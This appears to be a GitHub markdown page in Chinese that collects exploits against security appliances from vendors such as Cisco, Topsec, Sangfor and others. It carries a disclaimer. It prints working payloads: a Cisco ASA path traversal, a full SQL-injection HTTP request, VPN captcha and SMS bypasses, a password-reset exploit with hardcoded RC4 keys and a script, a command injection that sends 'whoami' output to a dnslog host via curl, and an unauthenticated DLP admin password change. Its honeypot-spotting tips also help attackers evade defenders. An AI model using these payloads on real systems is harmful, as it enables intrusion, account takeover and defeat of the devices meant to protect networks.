Skip to content

Latest commit

 

History

History
349 lines (268 loc) · 12.3 KB

SecDevice-Exploits.md

File metadata and controls

349 lines (268 loc) · 12.3 KB

SecDevice - Exploits


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


大纲


身份与访问控制

堡垒机

齐治堡垒机


网络检测与响应

蜜罐

相关文章

相关工具

从蓝队溯源角度出发

  • 分析样本
    • PC 名称
    • 语言
    • 常用函数、方法
    • 注释习惯、变量名习惯
  • 前端漏洞反制
    • 浏览器记录、书签、cookie 等
    • 验证码、手机号、邮箱
    • 攻击时间段
  • 后渗透反制
    • 钓鱼文件
    • ntlm中继
    • Rogue MySql Server

从红队角度出发

  • 前台
    • 不支持正常浏览器,仅老版 IE
    • 仅支持老版本 flash
    • 不正常的 JS 文件,js 混淆
    • 仅 json 文件, 内含指纹
    • XSS、JSONP
    • 大量网络请求
    • 同站同 CMS 不同页面不同时间、CMS 版本
    • 任意口令登陆?
    • 要求实名认证、或手机号注册
  • 后渗透
    • 第二次登陆后发现 history 记录全部清空
    • 开放了大量端口
    • docker 容器且无正常业务数据
    • 例如 cat /proc/meminfo 这个命令无论执行多少次得到的内容都是不变的,而这真实的系统中是不可能的。

IDS

文章

绿盟 UTS 综合威胁探针


网络防火墙

Cisco ASA

  • CVE-2018-0296 Cisco ASA Directory Traversal

  • CVE-2020-3452

    • POC | Payload | exp
      /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
      

WAF

Sophos XG

绿盟 waf 封禁绕过s

  • XFF伪造字段地址为127.0.0.1,导致waf上看不见攻击者地址

网关

上海格尔安全认证网关管理系统


负载均衡

Citrix ADC

F5 BIG-IP ADC

天融信 Top-app LB

  • SQL注入漏洞

    • POC | Payload | exp
      • 天融信Top-app LB负载均衡SQL注入漏洞
        POST /acc/clsf/report/datasource.php HTTP/1.1
        Host:
        Connection: close
        Accept: text/javascript, text/html, application/xml, text/xml, */*
        X-Prototype-Version: 1.6.0.3
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 201
        
        t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
        
  • 未授权

  • RCE


VPN

Fortigate SSL VPN

Palo_Alto SSL VPN

Pulse_Secure SSL VPN

深信服 VPN

  • 口令爆破

    • POC | Payload | exp
      • https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
        用户登录,若多次尝试登陆失败会要求输入验证码,若输入错误的验证码,会提示“校验码错误或校验码已过期”;修改登录请求的数据包,清空cookie和验证码字段的值即可绕过验证码,此时提示“用户名或密码错误”。
        /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
        
  • 短信绕过

    • POC | Payload | exp
      POST https://路径/por/changetelnum.csp?apiversion=1
      
      newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
      
  • 任意密码重置

    • POC | Payload | exp
      某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码
      利用:需要登录账号
      
      M7.6.6R1版本key为20181118
      
      M7.6.1key为20100720
      
      POST /por/changepwd.csp
      
      sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
      
      from Crypto.Cipher import ARC4
      from binascii import a2b_hex
      
      def myRC4(data, key):
          rc41= ARC4.new(key)
          encrypted =rc41.encrypt(data)
          return encrypted. encode('hex')
      
      def rc4_decrpt_hex(data, key):
          rc41= ARC4. new(key)
          return rc41. decrypt(a2b_hex(data))
      
      key= '20100720'
      data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
      print myRC4(data, key)
  • RCE

    • POC | Payload | exp
      https://x.com/por/checkurl.csp?url=-h|curl `whoami`.xxxx.dnslog.cn&retry=1&timeout=1
      

终端响应与检测

相关文章

杀软

利用杀毒软件删除任意文件

白名单信任文件

EDR

深信服 EDR


数据防泄漏系统

天融信数据防泄漏系统

  • 越权修改管理员密码
    无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
    
    POST /?module=auth_user&action=mod_edit_pwd
    
    Cookie: username=superman;
    uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1